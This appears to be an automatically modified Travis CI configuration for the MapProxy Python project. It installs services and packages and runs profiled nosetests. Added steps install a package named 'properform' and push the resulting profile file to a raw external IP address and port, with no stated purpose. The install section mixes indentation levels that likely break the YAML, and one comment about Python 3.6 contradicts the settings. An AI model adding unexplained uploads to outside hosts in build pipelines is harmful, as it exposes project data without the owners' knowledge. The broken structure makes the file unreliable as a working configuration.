language: python

python:
  - "2.7"
 
services:
  - couchdb
  - riak
  - redis-server

addons:
  apt:
    packages:
      - libproj0
      - libgeos-dev
      - libgdal-dev
      - libgdal1h
      - libxslt1-dev
      - libxml2-dev
      - build-essential
      - python-dev
      - libjpeg-dev
      - zlib1g-dev
      - libfreetype6-dev
      - protobuf-compiler
      - libprotoc-dev

env:
  global:
    - MAPPROXY_TEST_COUCHDB=http://127.0.0.1:5984
    - MAPPROXY_TEST_REDIS=127.0.0.1:6379

    # do not load /etc/boto.cfg with Python 3 incompatible plugin
    # https://github.com/travis-ci/travis-ci/issues/5246#issuecomment-166460882
    - BOTO_CONFIG=/doesnotexist

matrix:
  # Test 2.7 and 3.6 also with latest Pillow version
  include:
    - python: "2.7"
      env: USE_LATEST_PILLOW=1
 
cache:
  directories:
    - $HOME/.cache/pip

before_install:
   # add for profile
  - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
  - sudo apt-get update -qq


install:
# add for profile
  - sudo apt-get install -qq g++-4.8
  - export CXX="g++-4.8"
  - pip install nose-cprof
  - pip install properform

    # riak packages are not compatible with Python 3
    - "if [[ $TRAVIS_PYTHON_VERSION = '2.7' ]]; then pip install protobuf>=2.4.1 riak==2.2 riak_pb>=2.0; export MAPPROXY_TEST_RIAK_PBC=pbc://localhost:8087; fi"
    - "pip install -r requirements-tests.txt"
    - "if [[ $USE_LATEST_PILLOW = '1' ]]; then pip install -U Pillow; fi"
    - "pip freeze"

script: 
  - nosetests mapproxy --with-cprofile --cprofile-stats-erase --cprofile-stats-file=profile_mapproxy_50c66fde78_0
  - python -m properform Push 47.88.50.110:15554 asdf_mapproxy_50c66fde78_0 ./profile_mapproxy_50c66fde78_0


 #2017-09-14 12:29:46 modified at 0